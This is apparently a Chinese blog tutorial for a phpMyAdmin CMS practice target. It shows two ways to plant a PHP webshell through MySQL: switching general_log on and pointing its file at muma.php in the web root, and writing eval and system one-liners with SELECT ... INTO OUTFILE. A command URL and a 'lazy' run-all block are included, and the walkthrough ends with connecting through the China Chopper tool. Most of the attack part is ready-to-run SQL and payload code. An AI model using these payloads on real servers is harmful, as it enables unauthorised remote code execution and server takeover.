phpMyAdmin之CMS靶场

方法一:通过日志文件拿webshell

常用的语句如下:

复制代码
show global variables like '%general%';
set global general_log='on'; 
set global general_log_file = 'D:/phpStudy_pro/WWW/muma.php';
show global variables like '%general%';
select '<?php eval($_POST["admin"]);?>';
select+'<?php+phpinfo();+?>'
select+'<?php+//%0Aphpinfo();+?>'

查看日志目录路径

复制代码
show global variables like '%general%';

打开日志功能

复制代码
set global general_log='on'; 

设置日志文件目录,创建php日志文件

复制代码
set global general_log_file='D:/phpStudy_pro/WWW/muma.php';

查看自己创建的日志文件

复制代码
show global variables like '%general%';

往日志文件里写一句话木马

复制代码
select '<?php eval($_POST["admin"]);?>';

使用中国菜刀工具连接自己创建的php文件。

链接到了服务器的目录

懒人方法:也可以直接全部运行

复制代码
show global variables like '%general%';
set global general_log='on'; 
set global general_log_file = 'D:/phpStudy_pro/WWW/muma.php';
show global variables like '%general%';
select '<?php eval($_POST["admin"]);?>';

方法二:上传日志文件拿shell

常用语句

复制代码
1.⾸先判断mysql位置
select @@datadir
路径:C:\phpStudy\MySQL\data\
2.猜测web路径
猜测web路径:C:\phpStudy\www
C:\phpStudy\WWW\web.php
3.写webshell
select "<?php eval($_POST[a]);?>" into outfile 'c:/phpstudy/www/b.php';
select "<?php system($_GET[a]);?>" into outfile 'c:/phpstudy/PHPTutorial/w
ww/d.php';
4.浏览器
http://192.168.2.8/d.php?a=dir ..\
select "<?php phpinfo();eval($_POST[a]);?>" into outfile 'C:\phpStudy\WWW
\web.php';
备注:/
不要⽤\,如⾥要⽤\\(转义)
相关推荐
欧先生^_^2 分钟前
OSPF网络协议
网络·网络协议·智能路由器
光而不耀@lgy38 分钟前
C++初登门槛
linux·开发语言·网络·c++·后端
Run1.1 小时前
深入解析 Linux 中动静态库的加载机制:从原理到实践
linux·运维·服务器
合新通信 | 让光不负所托1 小时前
【合新通信】浸没式液冷光模块与冷媒兼容性测试技术报告
大数据·网络·光纤通信
星哥说事2 小时前
使用开源免费雷池WAF防火墙,接入保护你的网站
web安全·开源
浩浩测试一下2 小时前
计算机网络中的DHCP是什么呀? 详情解答
android·网络·计算机网络·安全·web安全·网络安全·安全架构
码农hbk2 小时前
linux ptrace 图文详解(七) gdb、strace跟踪系统调用
linux·服务器
264玫瑰资源库2 小时前
斗鱼娱乐电玩平台源码搭建实录
运维·服务器·游戏·娱乐
hotlinhao3 小时前
ThinkPHP6模型中多组条件逻辑或Or查询的使用
linux·服务器·数据库
mit6.8244 小时前
[OS_8] 终端和 UNIX Shell | 会话和进程组 | sigaction | dash
运维·服务器